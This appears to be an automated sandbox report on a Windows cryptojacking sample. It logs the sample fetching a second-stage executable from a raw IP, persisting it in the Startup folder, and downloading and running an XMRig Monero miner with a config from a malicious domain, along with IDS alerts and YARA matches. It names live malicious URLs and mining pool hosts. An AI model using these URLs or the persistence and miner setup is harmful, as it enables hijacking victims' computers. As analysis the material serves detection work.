00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 30 05 00 76 01 00 00 01 00 00 11 28 10 00 00 0a 6f 11 00 00 0a 28 12 00 00 0a 2d 0e 28 01 00 00 06 0a 06 16 28 02 00 00 06 26 14 0b 28 13 00 00 0a 0c 08 72 01 00 00 70 6f 14 00 00 0a 0d 16 8d 17 00 00 01 13 04 09 73 15 00 00 0a 13 05 72 1f 00 00 70 13 06 11 05 72 21 00 00 70 12 06 12 04 6f 16 00 00 0a de 0c 11 05 2c 07 11 05 6f 17 00 00 0a dc 28 18 00 00 0a 11 04 17 11 04 8e 69 17 59 6f 19 00 00 0a 0b 07 13 07 07 16 6f 1a 00 00 0a 1f 20 2e 0f 07 17 6f 1b 00 00 0a 6f 1c 00 00 0a 0b 2b 07 07 6f 1c 00 00 0a 0b 07 28 07 00 00 06 0b 02 8e 69 16 31 1c 72 37 00 00 70 72 4f 00 00 70 02 28 1d 00 00 0a 72 57 00 00 70 07 28 1e 00 00 0a 0b 02 13 0d 16 13 0e 2b 3c 11 0d 11 0e 9a 13 08 11 08 6f 1f 00 00 0a 72 61 00 00 70 28 20 00 00 0a 2c 1c 07 28 21 00 00 0a 11 07 16 6f 1a 00 00 0a 13 0f 12 0f 28 22 00 00 0a 28 21 00 00 0a 11 0e 17 58 13 0e 11 0e 11 0d 8e 69 32 bc de 03 26 de 00 02 07 72 1f 00 00 70 28 04 00 00 06 13 09 11 09 2d 05 17 13 0c de 42 16 13 0c de 3d

Source: Joe Sandbox View	IP Address: 185.199.109.133 185.199.109.133
Source: Joe Sandbox View	IP Address: 185.199.109.133 185.199.109.133
Source: Joe Sandbox View	IP Address: 140.82.121.3 140.82.121.3
Source: Joe Sandbox View	IP Address: 140.82.121.3 140.82.121.3

Source: Joe Sandbox View

ASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: Network traffic	Suricata IDS: 2047928 - Severity 2 - ET MALWARE CoinMiner Domain in DNS Lookup (pool .supportxmr .com) : 192.168.2.4:51606 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49730 -> 23.27.51.244:80
Source: Network traffic	Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49734 -> 206.189.156.69:80
Source: Network traffic	Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49741 -> 206.189.156.69:80
Source: Network traffic	Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49732 -> 185.199.109.133:443
Source: Network traffic	Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49731 -> 140.82.121.3:443
Source: Network traffic	Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49736 -> 140.82.121.3:443
Source: Network traffic	Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49733 -> 104.21.95.99:443
Source: Network traffic	Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49737 -> 185.199.109.133:443
Source: Network traffic	Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49739 -> 104.21.95.99:443

Source: global traffic	HTTP traffic detected: GET /xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-msvc-win64.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.2; en-CH) WindowsPowerShell/5.1.19041.1682Host: github.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /github-production-release-asset-2e65be/88327406/cbb07403-ee0c-4c81-9ded-5d5497635b93?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250108%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250108T104102Z&X-Amz-Expires=300&X-Amz-Signature=c3231b3fd9aefd44c30ccc55ac42d842573dc774aad7771dfb6f409d05444063&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dxmrig-6.22.2-msvc-win64.zip&response-content-type=application%2Foctet-stream HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.2; en-CH) WindowsPowerShell/5.1.19041.1682Host: objects.githubusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /config.json HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.2; en-CH) WindowsPowerShell/5.1.19041.1682Host: evilbit.proConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-msvc-win64.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.2; en-CH) WindowsPowerShell/5.1.19041.1682Host: github.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /github-production-release-asset-2e65be/88327406/cbb07403-ee0c-4c81-9ded-5d5497635b93?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250108%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250108T104102Z&X-Amz-Expires=300&X-Amz-Signature=c3231b3fd9aefd44c30ccc55ac42d842573dc774aad7771dfb6f409d05444063&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dxmrig-6.22.2-msvc-win64.zip&response-content-type=application%2Foctet-stream HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.2; en-CH) WindowsPowerShell/5.1.19041.1682Host: objects.githubusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /config.json HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.2; en-CH) WindowsPowerShell/5.1.19041.1682Host: evilbit.proConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /chrtrome22.exe HTTP/1.1User-Agent: Mozilla/5.0Host: 23.27.51.244Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.2; en-CH) WindowsPowerShell/5.1.19041.1682Host: wydkowqbjycsuwapzymz8ia5edhi9t1d7.oast.funConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.2; en-CH) WindowsPowerShell/5.1.19041.1682Host: wydkowqbjycsuwapzymz8ia5edhi9t1d7.oast.funConnection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknown	TCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknown	TCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknown	TCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknown	TCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknown	TCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknown	TCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknown	TCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknown	TCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknown	TCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknown	TCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknown	TCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\174.exe

Code function: 0_2_0042006A InternetOpenA,InternetOpenUrlA,SHGetFolderPathA,lstrcat,lstrcat,lstrcat,CreateFileA,InternetReadFile,WriteFile,CloseHandle,CloseHandle,CloseHandle,CloseHandle,ShellExecuteA,ShellExecuteA,ShellExecuteA,exit,

0_2_0042006A

Source: global traffic	HTTP traffic detected: GET /xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-msvc-win64.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.2; en-CH) WindowsPowerShell/5.1.19041.1682Host: github.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /github-production-release-asset-2e65be/88327406/cbb07403-ee0c-4c81-9ded-5d5497635b93?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250108%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250108T104102Z&X-Amz-Expires=300&X-Amz-Signature=c3231b3fd9aefd44c30ccc55ac42d842573dc774aad7771dfb6f409d05444063&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dxmrig-6.22.2-msvc-win64.zip&response-content-type=application%2Foctet-stream HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.2; en-CH) WindowsPowerShell/5.1.19041.1682Host: objects.githubusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /config.json HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.2; en-CH) WindowsPowerShell/5.1.19041.1682Host: evilbit.proConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-msvc-win64.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.2; en-CH) WindowsPowerShell/5.1.19041.1682Host: github.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /github-production-release-asset-2e65be/88327406/cbb07403-ee0c-4c81-9ded-5d5497635b93?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250108%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250108T104102Z&X-Amz-Expires=300&X-Amz-Signature=c3231b3fd9aefd44c30ccc55ac42d842573dc774aad7771dfb6f409d05444063&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dxmrig-6.22.2-msvc-win64.zip&response-content-type=application%2Foctet-stream HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.2; en-CH) WindowsPowerShell/5.1.19041.1682Host: objects.githubusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /config.json HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.2; en-CH) WindowsPowerShell/5.1.19041.1682Host: evilbit.proConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /chrtrome22.exe HTTP/1.1User-Agent: Mozilla/5.0Host: 23.27.51.244Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.2; en-CH) WindowsPowerShell/5.1.19041.1682Host: wydkowqbjycsuwapzymz8ia5edhi9t1d7.oast.funConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.2; en-CH) WindowsPowerShell/5.1.19041.1682Host: wydkowqbjycsuwapzymz8ia5edhi9t1d7.oast.funConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: wydkowqbjycsuwapzymz9igs0uo3k6tal.oast.fun
Source: global traffic	DNS traffic detected: DNS query: github.com
Source: global traffic	DNS traffic detected: DNS query: objects.githubusercontent.com
Source: global traffic	DNS traffic detected: DNS query: evilbit.pro
Source: global traffic	DNS traffic detected: DNS query: wydkowqbjycsuwapzymz8ia5edhi9t1d7.oast.fun
Source: global traffic	DNS traffic detected: DNS query: pool.supportxmr.com

Source: 174.exe, 174.exe, 00000000.00000002.1705380217.00000000059FD000.00000004.00000020.00020000.00000000.sdmp, 174.exe, 00000000.00000002.1699645811.0000000000420000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://23.27.51.244/chrtrome22.exe
Source: 174.exe, 00000000.00000002.1699645811.0000000000420000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://23.27.51.244/chrtrome22.exe/c
Source: chrtrome22.exe, 00000001.00000002.1798535542.00000000030C0000.00000004.00000800.00020000.00000000.sdmp, chrtrome22.exe, 00000001.00000002.1798535542.00000000030C9000.00000004.00000800.00020000.00000000.sdmp, WinRing0x64.sys.1.dr	String found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
Source: chrtrome22.exe, 00000001.00000002.1798535542.00000000030C0000.00000004.00000800.00020000.00000000.sdmp, chrtrome22.exe, 00000001.00000002.1798535542.00000000030C9000.00000004.00000800.00020000.00000000.sdmp, WinRing0x64.sys.1.dr	String found in binary or memory: http://crl.globalsign.net/Root.crl0
Source: chrtrome22.exe, 00000001.00000002.1798535542.00000000030C0000.00000004.00000800.00020000.00000000.sdmp, chrtrome22.exe, 00000001.00000002.1798535542.00000000030C9000.00000004.00000800.00020000.00000000.sdmp, WinRing0x64.sys.1.dr	String found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
Source: chrtrome22.exe, 00000001.00000002.1798535542.00000000030C0000.00000004.00000800.00020000.00000000.sdmp, chrtrome22.exe, 00000001.00000002.1798535542.00000000030C9000.00000004.00000800.00020000.00000000.sdmp, WinRing0x64.sys.1.dr	String found in binary or memory: http://crl.globalsign.net/primobject.crl0
Source: chrtrome22.exe, 00000001.00000002.1798535542.00000000030DF000.00000004.00000800.00020000.00000000.sdmp, chrtrome22.exe, 00000006.00000002.1880311970.0000000003021000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://evilbit.pro
Source: chrtrome22.exe, 00000001.00000002.1798535542.0000000002E37000.00000004.00000800.00020000.00000000.sdmp, chrtrome22.exe, 00000006.00000002.1880311970.0000000002F76000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://github.com
Source: chrtrome22.exe, 00000001.00000002.1798535542.0000000002E80000.00000004.00000800.00020000.00000000.sdmp, chrtrome22.exe, 00000006.00000002.1880311970.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://objects.githubusercontent.com
Source: chrtrome22.exe, 00000001.00000002.1798535542.0000000002B51000.00000004.00000800.00020000.00000000.sdmp, chrtrome22.exe, 00000006.00000002.1880311970.0000000002C91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: chrtrome22.exe, chrtrome22.exe, 00000006.00000002.1880311970.0000000003155000.00000004.00000800.00020000.00000000.sdmp, chrtrome22.exe, 00000006.00000002.1880311970.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp, chrtrome22.exe, 00000006.00000002.1880311970.0000000002C91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://wydkowqbjycsuwapzymz8ia5edhi9t1d7.oast.fun
Source: chrtrome22.exe, 00000006.00000002.1880311970.0000000003155000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://wydkowqbjycsuwapzymz8ia5edhi9t1d7.oast.fun/
Source: chrtrome22.exe, 00000001.00000002.1798535542.00000000032AB000.00000004.00000800.00020000.00000000.sdmp, chrtrome22.exe, 00000006.00000002.1880311970.0000000003155000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://wydkowqbjycsuwapzymz8ia5edhi9t1d7.oast.fun/p
Source: chrtrome22.exe, 00000001.00000002.1798535542.00000000030DF000.00000004.00000800.00020000.00000000.sdmp, chrtrome22.exe, 00000006.00000002.1880311970.0000000003021000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://evilbit.pro
Source: chrtrome22.exe, chrtrome22.exe, 00000006.00000002.1880311970.0000000003021000.00000004.00000800.00020000.00000000.sdmp, chrtrome22.exe, 00000006.00000002.1880311970.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp, chrtrome22.exe, 00000006.00000002.1880311970.0000000002C91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://evilbit.pro/config.json
Source: chrtrome22.exe, 00000001.00000002.1798535542.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, chrtrome22.exe, 00000006.00000002.1880311970.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com
Source: chrtrome22.exe, 00000006.00000002.1880311970.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp, chrtrome22.exe, 00000006.00000002.1880311970.0000000002C91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-msvc-win64.zip
Source: chrtrome22.exe, 00000001.00000002.1798535542.000000000302E000.00000004.00000800.00020000.00000000.sdmp, chrtrome22.exe, 00000001.00000002.1798535542.0000000003042000.00000004.00000800.00020000.00000000.sdmp, chrtrome22.exe, 00000001.00000002.1798535542.0000000003021000.00000004.00000800.00020000.00000000.sdmp, pool_mine_example.cmd.1.dr	String found in binary or memory: https://miningpoolstats.stream/monero
Source: chrtrome22.exe, 00000001.00000002.1798535542.0000000003064000.00000004.00000800.00020000.00000000.sdmp, chrtrome22.exe, 00000001.00000002.1798535542.0000000003042000.00000004.00000800.00020000.00000000.sdmp, chrtrome22.exe, 00000001.00000002.1798535542.0000000003050000.00000004.00000800.00020000.00000000.sdmp, rtm_ghostrider_example.cmd.1.dr	String found in binary or memory: https://miningpoolstats.stream/raptoreum
Source: chrtrome22.exe, 00000001.00000002.1798535542.0000000002E62000.00000004.00000800.00020000.00000000.sdmp, chrtrome22.exe, 00000006.00000002.1880311970.0000000002FA4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://objects.githubusercontent.com
Source: chrtrome22.exe, 00000001.00000002.1798535542.0000000002E62000.00000004.00000800.00020000.00000000.sdmp, chrtrome22.exe, 00000006.00000002.1880311970.0000000002FA4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://objects.githubusercontent.com/github-production-release-asset-2e65be/88327406/cbb07403-ee0c-
Source: xmrig.exe, 00000008.00000000.1796096709.00007FF602807000.00000002.00000001.01000000.00000008.sdmp, xmrig.exe, 0000000B.00000000.1861121743.00007FF602807000.00000002.00000001.01000000.00000008.sdmp, xmrig.exe.1.dr	String found in binary or memory: https://xmrig.com/benchmark/%s
Source: xmrig.exe, 00000008.00000000.1796096709.00007FF602807000.00000002.00000001.01000000.00000008.sdmp, xmrig.exe, 0000000B.00000000.1861121743.00007FF602807000.00000002.00000001.01000000.00000008.sdmp, xmrig.exe.1.dr	String found in binary or memory: https://xmrig.com/docs/algorithms
Source: xmrig.exe, 00000008.00000000.1796096709.00007FF602807000.00000002.00000001.01000000.00000008.sdmp, xmrig.exe, 0000000B.00000000.1861121743.00007FF602807000.00000002.00000001.01000000.00000008.sdmp, xmrig.exe.1.dr	String found in binary or memory: https://xmrig.com/wizard
Source: xmrig.exe, 00000008.00000000.1796096709.00007FF602807000.00000002.00000001.01000000.00000008.sdmp, xmrig.exe, 0000000B.00000000.1861121743.00007FF602807000.00000002.00000001.01000000.00000008.sdmp, xmrig.exe.1.dr	String found in binary or memory: https://xmrig.com/wizard%s

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443

Source: unknown	HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.95.99:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.95.99:443 -> 192.168.2.4:49739 version: TLS 1.2

Spam, unwanted Advertisements and Ransom Demands

Reads the Security eventlog

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior

Reads the System eventlog

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\PowerShell	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\PowerShell	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior

System Summary

Malicious sample detected (through community Yara rule)

Source: 8.0.xmrig.exe.7ff6023e0000.0.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 8.0.xmrig.exe.7ff6023e0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 8.0.xmrig.exe.7ff6023e0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 11.0.xmrig.exe.7ff6023e0000.0.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 11.0.xmrig.exe.7ff6023e0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 11.0.xmrig.exe.7ff6023e0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 00000008.00000000.1796096709.00007FF602807000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000000B.00000000.1861121743.00007FF602807000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: Process Memory Space: xmrig.exe PID: 5752, type: MEMORYSTR	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: Process Memory Space: xmrig.exe PID: 7340, type: MEMORYSTR	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: C:\xmrig\xmrig-6.22.2\xmrig.exe, type: DROPPED	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: C:\xmrig\xmrig-6.22.2\xmrig.exe, type: DROPPED	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: C:\xmrig\xmrig-6.22.2\xmrig.exe, type: DROPPED	Matched rule: Detects coinmining malware Author: ditekSHen

Source: C:\xmrig\xmrig-6.22.2\xmrig.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe

File created: C:\xmrig\xmrig-6.22.2\WinRing0x64.sys

Jump to behavior

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Code function: 1_2_00007FFD9B8B8375		1_2_00007FFD9B8B8375
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Code function: 6_2_00007FFD9B898525		6_2_00007FFD9B898525

Source: Joe Sandbox View

Dropped File: C:\xmrig\xmrig-6.22.2\WinRing0x64.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5

Source: 174.exe

Static PE information: No import functions for PE file found

Source: 174.exe, 00000000.00000002.1705380217.0000000005A32000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: OriginalFilenameCmd.Exe.MUIj% vs 174.exe

Source: 8.0.xmrig.exe.7ff6023e0000.0.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 8.0.xmrig.exe.7ff6023e0000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 8.0.xmrig.exe.7ff6023e0000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
